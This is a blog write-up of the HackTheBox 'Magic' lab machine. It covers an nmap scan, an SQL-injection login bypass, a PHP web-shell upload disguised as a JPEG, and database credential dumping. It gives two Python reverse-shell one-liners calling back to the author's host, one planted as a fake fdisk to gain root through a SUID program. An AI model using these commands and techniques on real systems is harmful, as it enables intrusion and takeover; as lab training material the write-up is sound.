HackTheBox Magic Writeup – 10.10.10.185

HackTheBox Magic Writeup – 10.10.10.185

Hey guys, I’m back with another writeup. This time it is the writeup of new Magic (10.10.10.185) Linux machine by TRX released by HackTheBox on 18th April. The machine was classified as Medium difficulty with 30 points.

DIFFICULTY: MEDIUM

A very simple and straightforward box with an SQLi exploitation for initial foothold. The machine has a number of vulnerabilities, a file upload vulnerability, bypassing login page authentication using SQLi, uploading WebShell (for me at least, some used different techniques), reading MySQL database etc.

Let us begin.

Enumeration

As always, I add the machine IP to hosts file as magic.htb and I proceed with the NAMP scan.

NMAP Scan Results:

$ nmap -T4 -A -sV -sS magic.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 09:07 +03
Nmap scan report for magic.htb (10.10.10.185)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/20%OT=22%CT=1%CU=44149%PV=Y%DS=2%DC=T%G=Y%TM=5E9D3C3
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   117.80 ms 10.10.14.1
2   117.82 ms magic.htb (10.10.10.185)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.38 seconds

The NMAP scan shows, SSH on port 22 and Apache Webserver is running on the port 80. I proceed to inspect the port 80.

There is an image portfolio website running on the Apache Webserver. I noticed a login page, tried with admin:admin and a couple of common credentials to see if works, but no.

After a couple of tries, I used the simple SQL injection payloads as credentials, for my surprise it worked and I’m logged-in

As I logged in there is an upload button to upload images. The image formats (JPG, JPEG & PNG) are the only files are allowed to upload.

Reverse Shelling Using PHP WebShell

I recall an old machine where I had a similar scenario, there was a point I had to upload a PHP Web Shell to again access to the system. So I decided to do the same. When I think of PHP Web Shell, I think of WhiteWinterWolf’s PHP web shell.

I download the Webshell and renamed it to nav1n.php.jpeg and add the JPEG hex at the beginning of the image file. I went ahead and upload the file.

After successful upload, I have my PHP Webshell is ready. However, I was preparing for reverse shell command and noticed my shell was gone, then I realized that the uploaded files are being deleted after a minute or so.

As I have my Webshell and reverse shell script is ready, I prepared my listener and execute the simple Python Reverse Shell command using Web shell. And boom, I have reverse shell in my listener as www-data.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

I started to enumerate the www/Magic folder and noticed a PHP file called “db.php5”, I cat it and found credentials for user theseus.

theseus:iamkingtheseus

However, this credential didn’t work for switching the users to Theseus or SSH. There must be some other way to privilege escalation, so I kept my enumeration continued.

Upon treading the code, I realized that the credentials are not for Users, instead they are for MySQL Database. I now proceeded to dump the database and read tables and find the credentials possibly stored there.

Dumping MySQL Database

Easy way to dump MySQL database is as easy as below command. I have the DB credentials, so I tried with the below command.

mysqldump -u [username] –p[password] [database_name] > [dump_file.sql]

I made a dumb mistake, and I was kept getting “Access Denied”. I was certain that the credentials I have should be correct. Then after a few tried I realized that the command I was trying to dump database was incorrect. In MySQLDump command there is no space between -u(username) and -p(password)

After fixing my command I got the database dump.

As I assumed I found new credential for the user Admin in the “Login” table.

admin:Th3s3usW4sK1ng

Privilege Escalation As Theseus

When I tried to switch users as Admin I still got access denied. But the password was for Theseus not “Admin”. I got logged-in as Theseus. I grab the user.txt from user Theseus immediately.

Privilege Escalation To Root

A quick SUID search revealed the user Theseus has permission to following files as well.

I run the SysInfo and the result showed the VM hardware information.

I somehow know that SysInfo can help to get root, but honestly I’m very poor in that. I DM one of the early rooters in the forum asking for a help. He informed me that a custom-made fdisk with revershell inside temp directory will get you root when you run the Sysinfo.

I understood the process, but still unsure how to run “Custom Made FDISK ” inside the temp directory. I started to Google for more help and finally made my mind to gather everything and start.

What I did was I made a file called “fdisk” and edit it using text editor and add the following reverse shell code.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I set up my listener to listen the port 9999

I upload the file to a new directory that I created inside the tmp directory.

I modified the permission to execute.

And finally run the SysInfo. And, there I have Reverse shell as root in my listener.

That’s all folks, this is how I root the Magic box. Thank you for dropping by and reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.